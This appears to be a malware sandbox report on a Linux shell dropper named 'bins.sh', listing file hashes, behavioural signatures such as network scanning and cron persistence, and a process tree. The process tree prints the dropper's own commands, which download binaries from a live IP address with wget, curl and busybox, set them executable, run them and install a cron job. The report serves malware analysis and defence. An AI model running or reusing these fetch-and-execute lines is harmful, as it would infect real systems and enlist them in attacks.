Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
04-11-2024 23:27
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
0608e8f1df47e2008cb35811c967d18e
-
SHA1
d9c11296c385ae6dd53490fbb042c51fb00734c0
-
SHA256
2835c76202590f8f399672f9075da9d4ecf4cad9ad13f1d864081841188cf7cc
-
SHA512
8b65cb5e0aa378cfb150c7f17bf7833760d5844625d83f742c9e56330d9636c64545ca9a48f1ec8ae12a3106ab3103e64f29adcee26bfec9797a0dac31cf465c
-
SSDEEP
192:WHHqLCEO+xjXjjjojfj/juUIguu65GW0/u65GW0uHHqLojXjjjojfj/j5Ok:WHHqLC5+xTX8TbaUIg/HHqLoTX8Tbwk
Malware Config
Signatures
-
Contacts a large (2072) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid Process 676 chmod 691 chmod -
Executes dropped EXE 2 IoCs
Processes:
SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZxZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtDioc pid Process /tmp/SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx 677 SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx /tmp/ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD 692 ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD -
Renames itself 1 IoCs
Processes:
ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtDpid Process 693 ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.OlfyOz crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtDcurlcurldescription ioc Process File opened for reading /proc/1098/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1078/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/794/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/875/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/921/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/729/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/896/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/880/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/935/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/640/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/749/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/777/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/863/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1015/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1038/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1044/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/21/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/725/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/780/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/852/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1024/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1109/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/721/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/26/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/739/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/970/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/18/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/28/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/284/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/918/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1034/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/9/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/881/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/988/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1066/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/761/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/743/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/748/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/792/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/793/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1014/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/self/auxv curl File opened for reading /proc/771/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/845/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/886/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/822/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1104/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/23/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1088/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/888/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/795/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/734/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/741/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/783/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/948/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/990/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/643/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/937/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/965/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/733/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/923/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1012/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD File opened for reading /proc/1107/cmdline ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlbusyboxwgetcurlbusyboxwgetdescription ioc Process File opened for modification /tmp/SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx curl File opened for modification /tmp/SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx busybox File opened for modification /tmp/ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD wget File opened for modification /tmp/ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD curl File opened for modification /tmp/ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD busybox File opened for modification /tmp/SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:644
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx2⤵
- Writes file to tmp directory
PID:650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:668
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx2⤵
- Writes file to tmp directory
PID:674
-
-
/bin/chmodchmod 777 SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx./SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx2⤵
- Executes dropped EXE
PID:677
-
-
/bin/rmrm SxD3kQrbiKwKyQbrOZpB7Qn8GS0wnXaaZx2⤵PID:679
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD2⤵
- Writes file to tmp directory
PID:680
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD2⤵
- Writes file to tmp directory
PID:687
-
-
/bin/chmodchmod 777 ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD2⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD./ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:692 -
/bin/shsh -c "crontab -l"3⤵PID:694
-
/usr/bin/crontabcrontab -l4⤵PID:695
-
-
-
/bin/shsh -c "crontab -"3⤵PID:698
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:699
-
-
-
-
/bin/rmrm ZkTy5PXlO8Nnu0VK7nK6WAeAK2X13E5CtD2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NsUH1PIP0DVZrHrUQ6iUBxx8N4n4doOYZg2⤵
- System Network Configuration Discovery
PID:713
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD5ad5dbac76c3b8a1a1206041c1a3aa776
SHA153f89047d1c7aaccf01d93f1313137a73ccf3b08
SHA2560266bec1a0bcbec412bc5d0fa9b9eaa61e61ccc372eb7ba8da7a18e3560ee386
SHA512c14260fbfb187c82d59da7d3df5a1443f2e6ec15e6e54a120d51b7e5345e7e6448313288d2d5059b9ec4fcf0390e2d5a92205b1e8bc032c072e976c413ed82bb